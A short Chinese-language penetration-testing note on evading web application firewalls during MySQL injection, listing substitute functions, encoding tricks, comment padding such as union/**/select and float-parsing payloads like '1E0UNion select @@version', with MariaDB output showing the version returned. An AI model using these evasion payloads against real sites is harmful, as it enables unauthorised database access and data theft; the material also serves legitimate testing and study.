绕WAF

参考：
https://mp.weixin.qq.com/s/Qn-zh7SwG9wA3dGEz_AEqA
绕各类WAF是渗透测试人员的一项基本技能。WAF分为

• 云WAF(如 加速乐)
• 硬件WAF(如 绿盟WAF)
• 软件WAF(如 安全狗)
• 代码级WAF

mysql注入

关键字替换。

如在mysql中，WAF将sleep()函数加入黑名单，可以用具备相似功能的benchmark()函数实现绕过。部分相似功能的替代函数：

< > 等价于 BETWEEN

= 等价于 like

hex() bin() 等价于ascii()

sleep() 等价于 benchmark()

mid() substring() 等价于 substr(）

@@user 等价于 User()

@@Version 等价于 version()

(mysql支持&&  || ,oracle不支持 && ||）

特殊符号

结合不同数据库的特性差别来实现绕过（最好是可以找到WAF开发者都不了解的某些特性）
比如“`”放在mysql的末尾会起到注释符的作用。

编码

可以结合各种编码方式，比如url编码，url双重，多重编码，hex编码，unicode编码，数据库编码等。

注释符

/blahblah/是注释，也可以充当空白符。因为//可以使得mysql对sql语句union/**/select词法解析成功。其实许多WAF也考虑到了//可以作为空白分割，但是WAF检测/\*.*\*/很消耗性能，工程师会折中，可能在检测中间引入一些特殊字符，例如：/*\w+*/。或者，WAF可能只检查n个字符/\*.{,n}\*/。可逐步测试长度来绕过：

方法：先测试最基本的union/**/select再测试中间引入的特殊字，最后测试注释长度：

union/*aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa*/select

浮点数词法解析

利用mysql解析浮点数的特点，正则表达式无法匹配出单词union,

MariaDB [ultrax]> select email from pre_ucenter_members where uid=1E0UNion select @@version;
+--------------------------+
| email                    |
+--------------------------+
| [email protected] |
| 10.1.23-MariaDB-9+deb9u1 |
+--------------------------+
2 rows in set (0.00 sec)
MariaDB [ultrax]> select email from pre_ucenter_members where uid=1.0UNion select @@version;
+--------------------------+
| email                    |
+--------------------------+
| [email protected] |
| 10.1.23-MariaDB-9+deb9u1 |
+--------------------------+
2 rows in set (0.00 sec)

//TODO